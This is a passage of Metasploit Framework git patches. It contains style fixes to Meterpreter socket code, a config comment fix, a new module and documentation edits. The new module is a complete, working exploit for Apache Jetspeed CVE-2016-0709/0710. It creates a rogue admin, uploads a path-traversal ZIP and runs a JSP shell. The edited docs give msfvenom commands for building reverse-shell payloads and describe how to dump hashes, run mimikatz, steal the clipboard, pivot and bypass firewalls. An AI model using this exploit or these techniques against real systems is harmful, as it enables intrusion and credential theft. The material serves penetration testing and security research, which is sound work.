6388578ee685e739f1a092d3ac50685330469e98 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 23 Mar 2016 16:15:46 -0500 Subject: [PATCH 607/686] Style fixes --- lib/rex/io/datagram_abstraction.rb | 1 + lib/rex/post/meterpreter/channels/datagram.rb | 2 +- .../channels/socket_abstraction.rb | 4 ++-- .../extensions/stdapi/net/socket.rb | 22 +++++++++---------- .../socket_subsystem/tcp_client_channel.rb | 12 +++++----- .../net/socket_subsystem/udp_channel.rb | 18 +++++++-------- 6 files changed, 30 insertions(+), 29 deletions(-) diff --git a/lib/rex/io/datagram_abstraction.rb b/lib/rex/io/datagram_abstraction.rb index a052a13b1f..bf9492dfa2 100644 --- a/lib/rex/io/datagram_abstraction.rb +++ b/lib/rex/io/datagram_abstraction.rb @@ -13,6 +13,7 @@ module IO ### module DatagramAbstraction include Rex::IO::SocketAbstraction + # # Creates a streaming socket pair # diff --git a/lib/rex/post/meterpreter/channels/datagram.rb b/lib/rex/post/meterpreter/channels/datagram.rb index 3cb33b1660..16498d1092 100644 --- a/lib/rex/post/meterpreter/channels/datagram.rb +++ b/lib/rex/post/meterpreter/channels/datagram.rb @@ -52,7 +52,7 @@ class Datagram < Rex::Post::Meterpreter::Channel Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_PEER_PORT ) - if( peerhost and peerport ) + if peerhost && peerport # Maxlen here is 65507, to ensure we dont overflow, we need to write twice # If the other side has a full 64k, handle by splitting up the datagram and # writing multiple times along with the sockaddr. Consumers calling recvfrom diff --git a/lib/rex/post/meterpreter/channels/socket_abstraction.rb b/lib/rex/post/meterpreter/channels/socket_abstraction.rb index b08965d35b..c59577dfae 100644 --- a/lib/rex/post/meterpreter/channels/socket_abstraction.rb +++ b/lib/rex/post/meterpreter/channels/socket_abstraction.rb @@ -79,8 +79,8 @@ module SocketAbstraction # module DirectChannelWrite - def syswrite( buf ) - channel._write( buf ) + def syswrite(buf) + channel._write(buf) end attr_accessor :channel diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb index 0aa0d31f4d..753dd8c808 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb @@ -41,7 +41,7 @@ class Socket # register the inbound handler for the tcp server channel (allowing us to # receive new client connections to a tcp server channel) - client.register_inbound_handler( Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel ) + client.register_inbound_handler(Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel) end @@ -49,7 +49,7 @@ class Socket # Deregister the inbound handler for the tcp server channel # def shutdown - client.deregister_inbound_handler( Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel ) + client.deregister_inbound_handler(Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel) end ## @@ -63,17 +63,17 @@ class Socket # in the socket parameters instance. The +params+ argument is expected to be # of type Rex::Socket::Parameters. # - def create( params ) + def create(params) res = nil - if( params.tcp? ) - if( params.server? ) - res = create_tcp_server_channel( params ) + if params.tcp? + if params.server? + res = create_tcp_server_channel(params) else - res = create_tcp_client_channel( params ) + res = create_tcp_client_channel(params) end - elsif( params.udp? ) - res = create_udp_channel( params ) + elsif params.udp? + res = create_udp_channel(params) end return res @@ -102,7 +102,7 @@ class Socket def create_tcp_client_channel(params) begin channel = SocketSubsystem::TcpClientChannel.open(client, params) - if( channel != nil ) + if channel != nil return channel.lsock end return nil @@ -121,7 +121,7 @@ class Socket def create_udp_channel(params) begin channel = SocketSubsystem::UdpChannel.open(client, params) - if( channel != nil ) + if channel != nil return channel.lsock end return nil diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb index 9574caebc5..09832b6c2b 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb @@ -69,14 +69,14 @@ class TcpClientChannel < Rex::Post::Meterpreter::Stream # # Passes the channel initialization information up to the base class. # - def initialize( client, cid, type, flags ) - super( client, cid, type, flags ) + def initialize(client, cid, type, flags) + super(client, cid, type, flags) - lsock.extend( SocketInterface ) - lsock.extend( DirectChannelWrite ) + lsock.extend(SocketInterface) + lsock.extend(DirectChannelWrite) lsock.channel = self - rsock.extend( SocketInterface ) + rsock.extend(SocketInterface) rsock.channel = self end @@ -101,7 +101,7 @@ class TcpClientChannel < Rex::Post::Meterpreter::Stream request.add_tlv(TLV_TYPE_SHUTDOWN_HOW, how) request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid) - response = client.send_request(request) + client.send_request(request) return true end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb index dda93f0040..c9f3511624 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb @@ -60,17 +60,17 @@ class UdpChannel < Rex::Post::Meterpreter::Datagram # # Simply initialize this instance. # - def initialize( client, cid, type, flags ) - super( client, cid, type, flags ) + def initialize(client, cid, type, flags) + super(client, cid, type, flags) - lsock.extend( Rex::Socket::Udp ) + lsock.extend(Rex::Socket::Udp) lsock.initsock - lsock.extend( SocketInterface ) - lsock.extend( DirectChannelWrite ) + lsock.extend(SocketInterface) + lsock.extend(DirectChannelWrite) lsock.channel = self # rsock.extend( Rex::Socket::Udp ) - rsock.extend( SocketInterface ) + rsock.extend(SocketInterface) rsock.channel = self end @@ -79,8 +79,8 @@ class UdpChannel < Rex::Post::Meterpreter::Datagram # This function is called by Rex::Socket::Udp.sendto and writes data to a specified # remote peer host/port via the remote end of the channel. # - def send( buf, flags, saddr ) - af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr ) + def send(buf, flags, saddr) + _af, peerhost, peerport = Rex::Socket.from_sockaddr(saddr) addends = [ { @@ -93,7 +93,7 @@ class UdpChannel < Rex::Post::Meterpreter::Datagram } ] - return _write( buf, buf.length, addends ) + return _write(buf, buf.length, addends) end end From 7f002128ad2f5dd152d577f88650c31a0df6a58c Mon Sep 17 00:00:00 2001 From: Till Maas Date: Wed, 23 Mar 2016 22:23:30 +0100 Subject: [PATCH 608/686] Rectify MSF_CFGROOT_CONFIG comment Also remove reference to feature request that does not seem to be available anymore. --- lib/msf/base/config.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb index 4878180280..ca31d16d87 100644 --- a/lib/msf/base/config.rb +++ b/lib/msf/base/config.rb @@ -27,7 +27,7 @@ class Config < Hash # @return [String] the base configuration directory def self.get_config_root - # Use MSFCFGDIR environment variable first. See feature request #5797 + # Use MSF_CFGROOT_CONFIG environment variable first. val = Rex::Compat.getenv('MSF_CFGROOT_CONFIG') if (val and File.directory?(val)) return val From 2b908462685d3363ea86978a25d556a5ce589966 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 15 Mar 2016 13:40:19 -0500 Subject: [PATCH 609/686] Add Apache Jetspeed exploit --- .../multi/http/apache_jetspeed_file_upload.rb | 218 ++++++++++++++++++ 1 file changed, 218 insertions(+) create mode 100644 modules/exploits/multi/http/apache_jetspeed_file_upload.rb diff --git a/modules/exploits/multi/http/apache_jetspeed_file_upload.rb b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb new file mode 100644 index 0000000000..7079620ed4 --- /dev/null +++ b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb @@ -0,0 +1,218 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Jetspeed Arbitrary File Upload', + 'Description' => %q{ + This module exploits the unsecured User Manager REST API and a ZIP file + path traversal in Apache Jetspeed-2, versions 2.3.0 and unknown earlier + versions, to upload and execute a shell. + + Note: this exploit will create, use, and then delete a new admin user. + + Warning: in testing, exploiting the file upload clobbered the web + interface beyond repair. No workaround has been found yet. Use this + module at your own risk. No check will be implemented. + }, + 'Author' => [ + 'Andreas Lindh', # Vulnerability discovery + 'wvu' # Metasploit module + ], + 'References' => [ + ['CVE', '2016-0710'], + ['CVE', '2016-0709'], + ['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'], + ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'], + ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710'] + ], + 'DisclosureDate' => 'Mar 6 2016', + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'win'], + 'Arch' => ARCH_JAVA, + 'Privileged' => false, + 'Targets' => [ + ['Apache Jetspeed <= 2.3.0 (Linux)', 'Platform' => 'linux'], + ['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win'] + ], + 'DefaultTarget' => 0 + )) + + register_options([ + Opt::RPORT(8080) + ]) + end + + def exploit + print_status("Creating admin user: #{username}:#{password}") + create_admin_user + # This was originally a typo... but we're having so much fun! + print_status('Kenny Loggins in') + kenny_loggins + print_warning('You have entered the Danger Zone') + print_status("Uploading payload ZIP: #{zip_filename}") + upload_payload_zip + print_status("Executing JSP shell: /jetspeed/#{jsp_filename}") + exec_jsp_shell + end + + def cleanup + print_status("Deleting user: #{username}") + delete_user + super + end + + # + # Exploit methods + # + + def create_admin_user + send_request_cgi( + 'method' => 'POST', + 'uri' => '/jetspeed/services/usermanager/users', + 'vars_post' => { + 'name' => username, + 'password' => password, + 'password_confirm' => password + } + ) + send_request_cgi( + 'method' => 'POST', + 'uri' => "/jetspeed/services/usermanager/users/#{username}", + 'vars_post' => { + 'user_enabled' => 'true', + 'roles' => 'admin' + } + ) + end + + def kenny_loggins + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/jetspeed/login/redirector' + ) + + res = send_request_cgi!( + 'method' => 'POST', + 'uri' => '/jetspeed/login/j_security_check', + 'cookie' => res.get_cookies, + 'vars_post' => { + 'j_username' => username, + 'j_password' => password + } + ) + + @cookie = res.get_cookies + end + + # Let's pretend we're mechanize + def import_file + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/jetspeed/portal/Administrative/site.psml', + 'cookie' => @cookie + ) + + html = res.get_html_document + import_export = html.at('//a[*//text() = "Import/Export"]/@href') + + res = send_request_cgi!( + 'method' => 'POST', + 'uri' => import_export, + 'cookie' => @cookie + ) + + html = res.get_html_document + html.at('//form[*//text() = "Import File"]/@action') + end + + def upload_payload_zip + zip = Rex::Zip::Archive.new + zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded) + + mime = Rex::MIME::Message.new + mime.add_part(zip.pack, 'application/zip', 'binary', + %Q{form-data; name="fileInput"; filename="#{zip_filename}"}) + mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"') + mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"') + + case target['Platform'] + when 'linux' + register_files_for_cleanup("../webapps/jetspeed/#{jsp_filename}") + register_files_for_cleanup("../temp/#{username}/#{zip_filename}") + when 'win' + register_files_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}") + register_files_for_cleanup("..\\temp\\#{username}\\#{zip_filename}") + end + + send_request_cgi( + 'method' => 'POST', + 'uri' => import_file, + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'cookie' => @cookie, + 'data' => mime.to_s + ) + end + + def exec_jsp_shell + send_request_cgi( + 'method' => 'GET', + 'uri' => "/jetspeed/#{jsp_filename}", + 'cookie' => @cookie + ) + end + + # + # Cleanup methods + # + + def delete_user + send_request_cgi( + 'method' => 'DELETE', + 'uri' => "/jetspeed/services/usermanager/users/#{username}" + ) + end + + # XXX: This is a hack because FileDropper doesn't delete directories + def on_new_session(session) + super + case target['Platform'] + when 'linux' + print_status("Deleting user temp directory: ../temp/#{username}") + session.shell_command_token("rm -rf ../temp/#{username}") + when 'win' + print_status("Deleting user temp directory: ..\\temp\\#{username}") + session.shell_command_token("rd /s /q ..\\temp\\#{username}") + end + end + + # + # Utility methods + # + + def username + @username ||= Rex::Text.rand_text_alpha_lower(8) + end + + def password + @password ||= Rex::Text.rand_text_alphanumeric(8) + end + + def jsp_filename + @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp' + end + + def zip_filename + @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip' + end + +end From 0852973b188a65e362acaa3f8ef8b0f8fe720cf5 Mon Sep 17 00:00:00 2001 From: tdoan-r7 Date: Thu, 24 Mar 2016 12:13:03 -0500 Subject: [PATCH 610/686] Minor edits for the following: https://issues.corp.rapid7.com/browse/MS-1197 https://issues.corp.rapid7.com/browse/MS-1198 https://issues.corp.rapid7.com/browse/MS-1199 https://issues.corp.rapid7.com/browse/MS-1200 https://issues.corp.rapid7.com/browse/MS-1201 --- .../scanner/http/tomcat_mgr_login.md | 10 +- .../auxiliary/scanner/smb/smb_login.md | 4 +- .../android/meterpreter/reverse_tcp.md | 46 +++---- .../windows/meterpreter/reverse_tcp.md | 130 ++++++++---------- .../modules/post/windows/gather/hashdump.md | 15 +- 5 files changed, 90 insertions(+), 115 deletions(-) diff --git a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md index f558f37fe7..9db11819dd 100644 --- a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md +++ b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md @@ -4,9 +4,9 @@ authentication. Please note that for Tomcat 7 or newer, the roles required to use the manager application were changed from the single manager role to the following four roles: -* manager-gui - allows access to the HTML GUI and the status pages. -* manager-script - allows access to the text interface and the status pages. -* manager-jmx - allows access to the JMX and the status pages. +* manager-gui - Allows access to the HTML GUI and the status pages. +* manager-script - Allows access to the text interface and the status pages. +* manager-jmx - Allows access to the JMX and the status pages. * manager-status - allows access to the status pages only. Older versions of Tomcat came with default passwords enabled by default. For example: @@ -31,9 +31,7 @@ loaded. ## Vulnerable Application -To download the vulnerable application, you can find it here: - -https://tomcat.apache.org/whichversion.html +To download the vulnerable application, you can find it here: https://tomcat.apache.org/whichversion.html. ## Verification Steps diff --git a/documentation/modules/auxiliary/scanner/smb/smb_login.md b/documentation/modules/auxiliary/scanner/smb/smb_login.md index e0e9391b68..b2f9b7903a 100644 --- a/documentation/modules/auxiliary/scanner/smb/smb_login.md +++ b/documentation/modules/auxiliary/scanner/smb/smb_login.md @@ -1,6 +1,4 @@ -The smb_login module is used to brute-force SMB remotely. SMB credentials are extra valuable for -you as an attacker, because they are system credentials, and you can probably reuse some of them -and log into more machines. +The smb_login module is used to bruteforce SMB remotely. SMB credentials are extra valuable because they are system credentials, and you can probably reuse some of them to log in to more machines. ## Vulnerable Application diff --git a/documentation/modules/payload/android/meterpreter/reverse_tcp.md b/documentation/modules/payload/android/meterpreter/reverse_tcp.md index 5a5a9f6498..cde18f507f 100644 --- a/documentation/modules/payload/android/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/android/meterpreter/reverse_tcp.md @@ -1,9 +1,8 @@ -The android/meterpreter/reverse_tcp payload is a Java-based meterpreter that can be used on an -Android device. It is still at an early stage of development, but there's so many things you can +The android/meterpreter/reverse_tcp payload is a Java-based Meterpreter that can be used on an +Android device. It is still at an early stage of development, but there are so many things you can do with it already. -The Android Meterpreter allows you to remote control the file system, listen to phone calls, -retrieve or send SMS messages, geo-locate the user, support for post modules, etc. +The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc. ## Vulnerable Application @@ -14,9 +13,9 @@ You can test android/meterpreter/reverse_tcp on these devices: An emulator is the most convenient way to test Android Meterpreter. You can try: * [Android SDK](http://developer.android.com/sdk/index.html#Other) - Creates and manages your emulators from a command prompt or terminal. -* [Android Studio](http://developer.android.com/sdk/installing/index.html?pkg=studio) - Easier to use than the SDK for managing the emulators. -* [GenyMotion](https://www.genymotion.com/download/) - An account is required. -* [AndroidAVDRepo](https://github.com/dral3x/AndroidAVDRepo) - A collection of pre-configured emulators. +* [Android Studio](http://developer.android.com/sdk/installing/index.html?pkg=studio) - Allows you to manage emulators more easily than the SDK. +* [GenyMotion](https://www.genymotion.com/download/) - Requires an account. +* [AndroidAVDRepo](https://github.com/dral3x/AndroidAVDRepo) - Contains a collection of pre-configured emulators. **A real Android device** @@ -31,7 +30,7 @@ get to test it over a real network. Currently, the most common way to use Android Meterpreter is to create it as an APK, and then execute it. -To create the APK, here is how with msfconsole: +To create the APK with msfconsole: ``` msf > use payload/android/meterpreter/reverse_tcp @@ -42,14 +41,14 @@ msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk msf payload(reverse_tcp) > ``` -And here is how with msfvenom: +To create the APK with msfvenom: ``` ./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk ``` Next, start an Android device. Upload the APK, and execute it. There are different ways to do this, -so please refer to Scenarios for more information. +so please refer to the Scenarios section for more information. ## Important Basic Commands @@ -64,7 +63,7 @@ meterpreter > pwd **cd** -The ```cd``` command allows you to change directory. Example: +The ```cd``` command allows you to change directory. For example: ``` meterpreter > cd cache @@ -73,11 +72,11 @@ meterpreter > ls **cat** -The ```cat``` command allows you to see the content of a file. +The ```cat``` command allows you to see the contents of a file. **ls** -The ```ls``` command display items in a directory. Example: +The ```ls``` command displays items in a directory. For example: ``` meterpreter > ls @@ -101,7 +100,7 @@ option allows you to do so recursively. **search** -THe ```search``` command allows you to find files on the remote target. For example: +The ```search``` command allows you to find files on the remote target. For example: ``` meterpreter > search -d . -f *.txt @@ -134,7 +133,7 @@ IPv6 Netmask : :: **getuid** -The ```getuid``` command shows you the current user that the payload is running as: +The ```getuid``` command shows the current user that the payload is running as: ``` meterpreter > getuid @@ -143,7 +142,7 @@ Server username: u0_a231 **ps** -The ```ps``` command shows you a list of processes the Android device is running. For example: +The ```ps``` command shows a list of processes the Android device is running. For example: ``` meterpreter > ps @@ -334,7 +333,7 @@ meterpreter > run post/android/capture/screen **Uploading APK to an Emulator using install_msf_apk.sh** The Metasploit Framework comes with a script that allows you to automatically upload your APK to -an active emulator, and execute it. It requires the [Android SDK platform-tools](http://developer.android.com/sdk/installing/index.html) to run, as well as [Java](https://java.com/en/download/). +an active emulator and execute it. It requires the [Android SDK platform-tools](http://developer.android.com/sdk/installing/index.html) to run, as well as [Java](https://java.com/en/download/). To use this, follow these steps: @@ -364,7 +363,7 @@ rm failed for -f, Read-only file system Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity } ``` -Back to msfconsole, you should receive a session: +Back in msfconsole, you should receive a session: ``` [*] Started reverse TCP handler on 192.168.1.199:4444 @@ -377,7 +376,7 @@ meterpreter > **Uploading APK to a real Android device using install_msf_apk.sh** -On the Android device, make sure to enable Developer Options. You can do this by: +On the Android device, make sure to enable Developer Options. To do this: 1. Go to Settings -> About -> Software Information 2. Tap on the Build Number section a couple of times. It should unlock Developer Options. @@ -404,10 +403,10 @@ And you should get a session. **Uploading APK from a Web Server** One way to upload an APK to Android without adb is by hosting it from a web server. To do this, -you must make sure to allow to trust "Unknown sources". Exactly how to do this varies, but normally +you must make sure to allow to trust "Unknown sources". The way to do this varies, but normally it's something like this: Settings -> Security -> Check "Unknown Sources" -Once you have that changed, do: +Once you have that changed, you'll need to: 1. Generate the APK payload. 2. Start a web server from the directory where the payload is: ```ruby -run -e httpd . -p 8181``` @@ -418,10 +417,9 @@ Once you have that changed, do: **Reconnect Android Meterpreter from the Browser Remotely** When you have the APK payload installed on your Android device, another trick to reconnect it is to -launch an intent from a browser - a term in Android development meaning an operation to be -performed. +launch an intent from a browser. An intent is simply a term in Android development that means "an operation to be performed." -To do this, here is how: +Here's how you do this: 1. In msfconsole, start a multi/handler for android/meterpreter/reverse_tcp as a background job. 2. Do: ```auxiliary/server/android_browsable_msf_launch```. diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md index 57997dd3c8..0b65ce91bf 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -1,9 +1,9 @@ windows/meterpreter/reverse_tcp is one of the most powerful features the Metasploit Framework has -to offer, and there's so many things you can do with it. +to offer, and there are so many things you can do with it. -It allows you to remotely control the file system, sniff, keylog, hashdump, network pivoting, +It allows you to remotely control the file system, sniff, keylog, hashdump, perform network pivoting, control the webcam and microphone, etc. It has the best support for post modules, and you can -load extensions such as mimikatz and python interpreter, etc. +load extensions, such as mimikatz and python interpreter, etc. windows/meterpreter/reverse_tcp is also the default payload for all Windows exploit targets. @@ -28,7 +28,7 @@ First, it is typically used as a payload for an exploit. Here's how to do that: Another way to use windows/meterpreter/reverse_tcp is to generate it as an executable. Normally, you would want to do it with msfvenom. If you are old school, you have probably also heard of -msfpayload and msfencode: msfvenom is a replacement of those. +msfpayload and msfencode. msfvenom is a replacement of those. The following is a basic example of using msfvenom to to generate windows/meterpreter/reverse_tcp as an executable: @@ -51,7 +51,7 @@ C:\Users\user\Desktop **cd command** -The ```cd``` command allows you to change directory. Example: +The ```cd``` command allows you to change directories. Example: ``` meterpreter > cd C:\\ @@ -226,7 +226,7 @@ The ```screenshot``` command takes a screenshot of the target machine. **webcam_list** -The ```webcam_list``` commands shows you a list of webcams that can be controlled by you. You +The ```webcam_list``` commands shows you a list of webcams that you can control. You'll probably want to use this first before using any other webcam commands. **webcam_snap** @@ -260,8 +260,8 @@ meterpreter > getsystem **hashdump** -The ```hashdump``` commands allows you to dump the Windows hashes if there's enough privilege. -Example: +The ```hashdump``` commands allows you to dump the Windows hashes if there are the right privileges. +For sxample: ``` meterpreter > hashdump @@ -277,9 +277,8 @@ SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:e09fcdea29d93203c925b2056 **Setting up for Testing** -For testing purposes, if you're tired of manually generating a payload and starting a multi handler -repeatedly, the auto_win32_multihandler.rc resource script in Metasploit automates that. Here's how -you would use it: +For testing purposes, if you don't want to manually generate a payload and start a multi handler +repeatedly, you can use the auto_win32_multihandler.rc resource script in Metasploit to automate that process. Here's how you would use it: First, run the resource script: @@ -304,16 +303,16 @@ msf exploit(handler) > ``` Next, go to your ~/.msf4/local directory, you should see meterpreter_reverse_tcp.exe in there. -Upload that payload to your test box, execute it, and you should receive a connection. +Upload that payload to your test box and execute it. You should receive a connection. **Using a Post Module** -One of the best things about using Meterpreter is you have access to a variety of post exploitation -modules, specifically the multi and Windows categories. Post modules provide more abilities to -control of collect data from the remote machine automatically. For example: stealing passwords -from popular applications, enumerate or modify system settings, etc. +One of the best things about Meterpreter is you have access to a variety of post exploitation +modules, specifically for the multi and Windows categories. Post modules provide you with more capabilities to +collect data from the remote machine automatically. For example, you can steal passwords +from popular applications and enumerate or modify system settings. -To use a post module from the Meterpreter prompt. Simply use the ```run``` command, like so: +To use a post module from the Meterpreter prompt, simply use the ```run``` command: ``` meterpreter > run post/windows/gather/checkvm @@ -330,9 +329,7 @@ documentation. **Using the Mimikatz Extension** -[Mimikatz](https://github.com/gentilkiwi/mimikatz) is a well known tool to extract passwords, hashes, PIN code, and kerberos tickets from -memory on Windows. This might actually be the first thing you want to use as soon as you get a -high-privileged session (such as SYSTEM). +[Mimikatz](https://github.com/gentilkiwi/mimikatz) is a well known tool to extract passwords, hashes, PIN code, and kerberos tickets from memory on Windows. This might actually be the first thing you want to use as soon as you get a high-privileged session, such as SYSTEM. To begin, load the extension: @@ -342,8 +339,8 @@ Loading extension mimikatz...success. meterpreter > ``` -This will create more commands for the Meterpreter prompt, most of them are meant to be used to -retrieve user names/hashes/passwords and other information: +This will create more commands for the Meterpreter prompt. Most of them are meant to be used to +retrieve user names, hashes, passwords and other information: ``` Mimikatz Commands @@ -360,7 +357,7 @@ Mimikatz Commands wdigest Attempt to retrieve wdigest creds ``` -An example of using ```msv```: +An example of using the ```msv``` command: ``` meterpreter > msv @@ -382,8 +379,8 @@ AuthID Package Domain User Password **Using the extapi Extension** -The main purpose of the extapi extension is for advanced enumeration of the target machine. For -example: registered services, open windows, clipboard, ADSI, WMI queries, etc. +The main purpose of the extapi extension is to perform advanced enumeration of the target machine. For +example, you can enumerate things like registered services, open windows, clipboard, ADSI, WMI queries, etc. To begin, at the Meterpreter prompt, do: @@ -393,10 +390,10 @@ Loading extension extapi...success. meterpreter > ``` -One great feature of the extension is clipboard management. The Windows clipboard is interesting, -because it can store anything sensitive: files, user names, passwords, etc, but not well protected. +One great feature of the extension is clipboard management. The Windows clipboard is interesting +because it can store anything that is sensitive, such as files, user names, and passwords, but it is not well protected. -For example: A password manager is a popular tool to store passwords encrypted. It allows the user +For example, a password manager is a popular tool to store encryped passwords. It allows the user to create complex passwords without the need to memorize any of them. All the user needs to do is open the password manager, retrieve the password for a particular account by copying it, and then paste it on a login page. @@ -506,12 +503,15 @@ To learn more about the Python extension, please read this [wiki](https://github **Network Pivoting** -There are three mains ways that you can use for moving around inside a network: the route command -in the msf prompt, in the Meterpreter prompt, and portfwd. +There are three mains ways that you can use for moving around inside a network: -The route command from the msf prompt allows you connect to hosts on a different network through -the compromised machine. You should be able to determine that by looking at the compromised -machine's ipconfig: + - The route command in the msf prompt + - The route command in the the Meterpreter prompt + - The portfwd command + +***Routing through msfconsole*** + +The route command from the msf prompt allows you connect to hosts on a different network through the compromised machine. You should be able to determine that by looking at the compromised machine's ipconfig: ``` [*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.201:49182) at 2016-03-04 20:35:31 -0600 @@ -547,10 +547,7 @@ IPv4 Netmask : 255.255.255.255 ... ``` -The above shows that we have a Meterpreter connection to 192.168.1.201 - let's call this box A. -And then box A is connected to the 192.100.0.0/24 VPN network. We as an attacker aren't connected -to this network directly, but we can explore that network through box A. So here's what we do by -routing: +The example above shows that we have a Meterpreter connection to 192.168.1.201. Let's call this box A, and it is connected to the 192.100.0.0/24 VPN network. As an attacker, we aren't connected to this network directly, but we can explore that network through box A. At the msf prompt, do: @@ -559,10 +556,9 @@ msf exploit(handler) > route add 192.100.0.0 255.255.255.0 1 [*] Route added ``` -Note: ```1``` means the session ID, the payload that is used as a gateway to talk to other machines. +The ```1``` at the end of the route indicates the session ID, the payload that is used as a gateway to talk to other machines. -So right now, we have a connection established to the VPN, and we should be able to connect to -another machine from that network: +So right now, we have a connection established to the VPN, and we should be able to connect to another machine from that network: ``` msf auxiliary(smb_version) > run @@ -573,16 +569,15 @@ msf auxiliary(smb_version) > run msf auxiliary(smb_version) > ``` -Another neat trick using route is that you can also bypass the compromised host's firewall this -way. For example, if the host has HTTP open, but SMB blocked by the firewall. You can try to -compromise it via HTTP first, use the route command to talk to SMB, and then try to exploit SMB. +Another neat trick using route is that you can also bypass the compromised host's firewall this way. For example, if the host has HTTP open, but SMB is blocked by the firewall, you can try to compromise it via HTTP first. You'll need to use the route command to talk to SMB and then try to exploit SMB. -The route command in Meterpreter allows you change the routing table that is on the target machine. -The way it needs to be configured is similar to the route command in msf. +***Routing through Meterpreter*** -The portfwd command allows you to talk to a remote service like it's local. For example, if you -are able to compromise a host via SMB, but not able to connect to the remote desktop service, then -you can do: +The route command in Meterpreter allows you change the routing table that is on the target machine. The way it needs to be configured is similar to the route command in msfconsole. + +***Routing through the portfwd command*** + +The portfwd command allows you to talk to a remote service like it's local. For example, if you are able to compromise a host via SMB, but are not able to connect to the remote desktop service, then you can do: ``` meterpreter > portfwd add –l 3389 –p 3389 –r > target host > @@ -596,23 +591,19 @@ rdesktop 127.0.0.1 **Meterpreter Paranoid Mode** -The paranoid mode forces the handler to be strict about which Meterpreter should be connecting to -it, hence the name "paranoid mode". +The paranoid mode forces the handler to be strict about which Meterpreter should be connecting to it, hence the name "paranoid mode". To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode). **Meterpreter Reliable Network Communication** -Exiting Metasploit using ```exit -y``` no longer terminates the payload session like it used to. -Instead, it will continue to run behind the scenes, attempting to connect back to Metasploit when -an appropriate handler is available. If you wish to exit the session, make sure to ```sessions -K``` first. +Exiting Metasploit using ```exit -y``` no longer terminates the payload session like it used to. Instead, it will continue to run behind the scenes, attempting to connect back to Metasploit when an appropriate handler is available. If you wish to exit the session, make sure to ```sessions -K``` first. To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication). **Meterpreter Sleep Control** -The sleep mode allows the payload on the target machine to be quiet for awhile, mainly in order to -avoid suspicious active communication, also better efficiency. +The sleep mode allows the payload on the target machine to be quiet for awhile, mainly in order to avoid suspicious active communication. It also provides better efficiency. It is very simple to use. At the Meterpreter prompt, simply do: @@ -626,15 +617,13 @@ To learn more about this feature, please [click here](https://github.com/rapid7/ **Meterpreter Stageless Mode** -A stageless Meterpreter allows a more economical way to deliver the payload, for cases where a -normal one would actually cost too much time and bandwidth in a penetration test. To learn more -about this, [click on this](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Stageless-Mode) to 